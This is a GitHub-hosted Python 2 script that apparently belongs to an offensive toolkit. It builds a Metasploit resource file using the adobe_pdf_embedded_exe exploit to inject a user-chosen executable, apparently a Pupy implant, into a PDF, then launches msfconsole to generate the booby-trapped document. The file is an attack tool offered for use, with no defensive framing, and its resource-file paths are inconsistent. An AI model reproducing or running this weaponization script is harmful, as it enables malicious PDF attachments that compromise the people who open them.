-
Notifications
You must be signed in to change notification settings - Fork 16
/
embed_pdf_pupy.py
72 lines (61 loc) · 2.86 KB
/
embed_pdf_pupy.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#!/usr/bin/env python
# coding=UTF-8
#The first line allows this script to be executable
import os
import socket
import operator
from termcolor import colored
import sys
sys.stdout.write("\x1b[8;{rows};{cols}t".format(rows=64, cols=200)) # sets window to full screen
def autorun_pdf_generate():
# start Metasploit manually
print 'Running Metasploit in MANUAL START MODE, do not interrupt'
os.system('service postgresql start')
print 'postgresql initialized'
# os.system('service metasploit start')
os.system('msfdb init')
print 'msfdb initialized'
os.system('msfdb start')
print 'Metasploit Database started'
# resource file command String
cmd_String = 'msfconsole -r %s' % makeembeddedpdf_name
print cmd_String
os.system(cmd_String)
os.system('db_status')
return
def ask_user_to_run():
question_Run_Now = str(raw_input("Do you want to generate the PDF now? Type 'Y' or 'N': "))
if question_Run_Now == "Y":
autorun_pdf_generate()
elif question_Run_Now == "N":
os.system('/root/EZPZ/ArmsCommander.py')
print 'You can start the PDF-maker script manually by typing: msfconsole -r /root/EZPZ/remoteexploits/generate_pdf.rc'
else:
print 'You have entered a invalid option, press "Y" or "N"'
ask_user_to_run()
return
custom_executable = str(raw_input("Enter the PATH of the custom executable you are using: "))
custom_pdf = str(raw_input("Enter the full path of the custom PDF you are injecting into: "))
output_pdf = str(raw_input("Make up a filename for output: "))
makeembeddedpdf_directory = '/root/EZPZ/remoteexploits/'
makeembeddedpdf_name = makeembeddedpdf_directory + 'generate_pdf' + '.rc'
os.system('chmod 777 /root/EZPZ/remoteexploits/generate_pdf.rc')
# keep getting this dumb errors
# Traceback (most recent call last):
# File "embed_pdf_pupy.py", line 21, in <module>
# makeembeddedpdf.write = ('use exploit/windows/fileformat/adobe_pdf_embedded_exe')
# AttributeError: 'file' object attribute 'write' is read-only
# FIXED it was just syntax error. No ' = ' signs between the write portion. You want to change it to .write('stuff')
payload_dir = '/root/EZPZ/payloads/'
makeembeddedpdf = open('/root/EZPZ/payloads/generate_pdf.rc', 'w')
makeembeddedpdf.write('use exploit/windows/fileformat/adobe_pdf_embedded_exe')
makeembeddedpdf.write('\nset EXENAME ' + custom_executable)
makeembeddedpdf.write('\nset INFILENAME ' + custom_pdf + '.pdf')
makeembeddedpdf.write('\nset FILENAME ' + payload_dir + output_pdf)
makeembeddedpdf.write('\nrun')
makeembeddedpdf.close()
print 'Your custom resource file is located at: %s' % makeembeddedpdf_name
print 'Would you like to run it now? Y or N.'
ask_user_to_run()
#offer the option of immediately running the resource file using Metasploit via my custom manual-startup script (to reduce database init errors)
# dont forget to add a return option